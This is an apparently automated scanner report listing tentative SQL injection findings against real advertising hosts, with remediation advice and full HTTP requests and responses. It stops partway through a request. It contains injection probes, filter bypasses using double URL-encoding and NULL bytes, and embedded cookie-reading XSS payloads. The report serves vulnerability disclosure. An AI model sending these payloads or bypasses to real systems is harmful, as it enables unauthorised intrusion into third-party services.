Cross Site Scripting, PoC, SQL Injection, Vulnerable Host Report

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91 [name of an arbitrarily supplied request parameter] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adi/N5875.270604.B3/B5111946.91

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N5875.270604.B3/B5111946.91;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?&1%20and%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1049
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 04:25:26 GMT
Expires: Tue, 25 Jan 2011 04:25:26 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,009 Template Name = Image Banner - Open in New Window -
...[SNIP]...
<a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3a9a/3/0/%2a/b%3B233909482%3B1-0%3B0%3B58746736%3B933-120/600%3B38657313/38675070/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://t.mookie1.com/t/v1/clk?migAgencyId=111&migSource=adsrv2&migTrackDataExt=2356384;58746736;233909482;38657313&migRandom=3942724&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.dominos.com/&utm_source=Banner&utm_medium=DPZ_Mbanner&utm_content=NoPromo&utm_campaign=MindshareBanner" target="_blank">
<img width="120" height="600" border="0" src="http://s0.2mdn.net/2356384/2-N7_Specialty_120x600.jpg">
</a>
<img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=111&migSource=adsrv2&migTrackDataExt=2356384;58746736;233909482;38657313&migRandom=3942724&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
</body></html>

Request 2

GET /adi/N5875.270604.B3/B5111946.91;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?&1%20and%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1118
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 04:25:26 GMT
Expires: Tue, 25 Jan 2011 04:25:26 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,009 Template Name = Image Banner - Open in New Window -
...[SNIP]...
<a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3a9a/3/0/%2a/e%3B233909482%3B0-0%3B0%3B58746736%3B933-120/600%3B37406893/37424770/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://t.mookie1.com/t/v1/clk?migAgencyId=111&migSource=adsrv2&migTrackDataExt=2356384;58746736;233909482;37406893&migRandom=3942755&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://express.dominos.com/pages/track.jsp?target=promocode&promocode=BANNQ7WN3&utm_source=Banner&utm_medium=DPZ_Mbanner&utm_content=ban_BANNQ7WN3&utm_campaign=MindshareBanner" target="_blank">
<img width="120" height="600" border="0" src="http://s0.2mdn.net/2356384/N5_5.99_OrderThisDeal_120x600.jpg">
</a>
<img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=111&migSource=adsrv2&migTrackDataExt=2356384;58746736;233909482;37406893&migRandom=3942755&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
</body></html>

1.2. http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adi/N5875.270604.B3/B5111946.91

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the sz parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N5875.270604.B3/B5111946.91;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?'%20and%201%3d1--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1055
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 04:25:25 GMT
Expires: Tue, 25 Jan 2011 04:25:25 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,009 Template Name = Image Banner - Open in New Window -
...[SNIP]...
<a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3a9a/3/0/%2a/o%3B233909482%3B2-0%3B0%3B58746736%3B933-120/600%3B40379675/40397462/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://t.mookie1.com/t/v1/clk?migAgencyId=111&migSource=adsrv2&migTrackDataExt=2356384;58746736;233909482;40379675&migRandom=3941709&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.dominos.com/&utm_source=Banner&utm_medium=DPZ_Mbanner&utm_content=NoPromo&utm_campaign=MindshareBanner" target="_blank">
<img width="120" height="600" border="0" src="http://s0.2mdn.net/2356384/1-Zeus_Dom_SuperBowl_120x600.gif">
</a>
<img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=111&migSource=adsrv2&migTrackDataExt=2356384;58746736;233909482;40379675&migRandom=3941709&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
</body></html>

Request 2

GET /adi/N5875.270604.B3/B5111946.91;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?'%20and%201%3d2--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1118
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 04:25:25 GMT
Expires: Tue, 25 Jan 2011 04:25:25 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,009 Template Name = Image Banner - Open in New Window -
...[SNIP]...
<a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3a9a/3/0/%2a/e%3B233909482%3B0-0%3B0%3B58746736%3B933-120/600%3B37406893/37424770/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://t.mookie1.com/t/v1/clk?migAgencyId=111&migSource=adsrv2&migTrackDataExt=2356384;58746736;233909482;37406893&migRandom=3941771&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://express.dominos.com/pages/track.jsp?target=promocode&promocode=BANNQ7WN3&utm_source=Banner&utm_medium=DPZ_Mbanner&utm_content=ban_BANNQ7WN3&utm_campaign=MindshareBanner" target="_blank">
<img width="120" height="600" border="0" src="http://s0.2mdn.net/2356384/N5_5.99_OrderThisDeal_120x600.jpg">
</a>
<img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=111&migSource=adsrv2&migTrackDataExt=2356384;58746736;233909482;37406893&migRandom=3941771&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
</body></html>

1.3. http://googleads.g.doubleclick.net/pagead/ads [frm parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The frm parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the frm parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the frm request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-6071864913982699&format=336x280_as&output=html&h=280&w=336&lmt=1295924961&alternate_ad_url=http%3A%2F%2Fwww.stands4.com%2Falternate.html&color_bg=FFFFFF&color_border=FFFFFF&color_link=000055&color_text=000000&color_url=550000&flash=10.1.103&url=http%3A%2F%2Fwww.abbreviations.com%2Fbs.aspx%3Fst%3Db1.aspx51536%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E7a00ceef170%26SE%3D3%26r%3D1&dt=1295903361302&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295903361405&frm=0%2527&adk=1370815790&ga_vid=1564661048.1295903333&ga_sid=1295903333&ga_hid=302104693&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&eid=30143102&ref=http%3A%2F%2Fburp%2Fshow%2F32&fu=0&ifi=1&dtd=126&xpc=ffdvLBmcAw&p=http%3A//www.abbreviations.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

Request 2

GET /pagead/ads?client=ca-pub-6071864913982699&format=336x280_as&output=html&h=280&w=336&lmt=1295924961&alternate_ad_url=http%3A%2F%2Fwww.stands4.com%2Falternate.html&color_bg=FFFFFF&color_border=FFFFFF&color_link=000055&color_text=000000&color_url=550000&flash=10.1.103&url=http%3A%2F%2Fwww.abbreviations.com%2Fbs.aspx%3Fst%3Db1.aspx51536%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E7a00ceef170%26SE%3D3%26r%3D1&dt=1295903361302&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295903361405&frm=0%2527%2527&adk=1370815790&ga_vid=1564661048.1295903333&ga_sid=1295903333&ga_hid=302104693&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&eid=30143102&ref=http%3A%2F%2Fburp%2Fshow%2F32&fu=0&ifi=1&dtd=126&xpc=ffdvLBmcAw&p=http%3A//www.abbreviations.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

1.4. http://googleads.g.doubleclick.net/pagead/ads [ga_hid parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The ga_hid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ga_hid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-6071864913982699&format=336x280_as&output=html&h=280&w=336&lmt=1295924961&alternate_ad_url=http%3A%2F%2Fwww.stands4.com%2Falternate.html&color_bg=FFFFFF&color_border=FFFFFF&color_link=000055&color_text=000000&color_url=550000&flash=10.1.103&url=http%3A%2F%2Fwww.abbreviations.com%2Fbs.aspx%3Fst%3Db1.aspx51536%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E7a00ceef170%26SE%3D3%26r%3D1&dt=1295903361302&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295903361405&frm=0&adk=1370815790&ga_vid=1564661048.1295903333&ga_sid=1295903333&ga_hid=302104693'&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&eid=30143102&ref=http%3A%2F%2Fburp%2Fshow%2F32&fu=0&ifi=1&dtd=126&xpc=ffdvLBmcAw&p=http%3A//www.abbreviations.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

Request 2

GET /pagead/ads?client=ca-pub-6071864913982699&format=336x280_as&output=html&h=280&w=336&lmt=1295924961&alternate_ad_url=http%3A%2F%2Fwww.stands4.com%2Falternate.html&color_bg=FFFFFF&color_border=FFFFFF&color_link=000055&color_text=000000&color_url=550000&flash=10.1.103&url=http%3A%2F%2Fwww.abbreviations.com%2Fbs.aspx%3Fst%3Db1.aspx51536%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E7a00ceef170%26SE%3D3%26r%3D1&dt=1295903361302&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295903361405&frm=0&adk=1370815790&ga_vid=1564661048.1295903333&ga_sid=1295903333&ga_hid=302104693''&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&eid=30143102&ref=http%3A%2F%2Fburp%2Fshow%2F32&fu=0&ifi=1&dtd=126&xpc=ffdvLBmcAw&p=http%3A//www.abbreviations.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

1.5. http://googleads.g.doubleclick.net/pagead/ads [h parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The h parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the h parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the h request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-3737471162188127&output=html&h=600%2527&slotname=3414113612&w=160&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.beirut.com%2Fcss%2Fblue%2F4429e%252527%25253balert%252528document.cookie%252529%25252f%25252f59f8c7185c5%2Fsearch-btn.gif&dt=1295922041953&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295922041995&frm=1&adk=1261819541&ga_vid=478840491.1295922042&ga_sid=1295922042&ga_hid=1179528252&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3522672927&fu=0&ifi=1&dtd=287 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d1.openx.org/afr.php?n=a2bb8a70&zoneid=121960&target=_blank&cb=416587824
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

Request 2

GET /pagead/ads?client=ca-pub-3737471162188127&output=html&h=600%2527%2527&slotname=3414113612&w=160&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.beirut.com%2Fcss%2Fblue%2F4429e%252527%25253balert%252528document.cookie%252529%25252f%25252f59f8c7185c5%2Fsearch-btn.gif&dt=1295922041953&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295922041995&frm=1&adk=1261819541&ga_vid=478840491.1295922042&ga_sid=1295922042&ga_hid=1179528252&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3522672927&fu=0&ifi=1&dtd=287 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d1.openx.org/afr.php?n=a2bb8a70&zoneid=121960&target=_blank&cb=416587824
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

1.6. http://googleads.g.doubleclick.net/pagead/ads [output parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The output parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the output parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pagead/ads?client=ca-pub-3737471162188127&output=html%00'&h=600&slotname=3414113612&w=160&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.beirut.com%2Fcss%2Fblue%2F4429e%252527%25253balert%252528document.cookie%252529%25252f%25252f59f8c7185c5%2Fsearch-btn.gif&dt=1295922041953&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295922041995&frm=1&adk=1261819541&ga_vid=478840491.1295922042&ga_sid=1295922042&ga_hid=1179528252&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3522672927&fu=0&ifi=1&dtd=287 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d1.openx.org/afr.php?n=a2bb8a70&zoneid=121960&target=_blank&cb=416587824
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
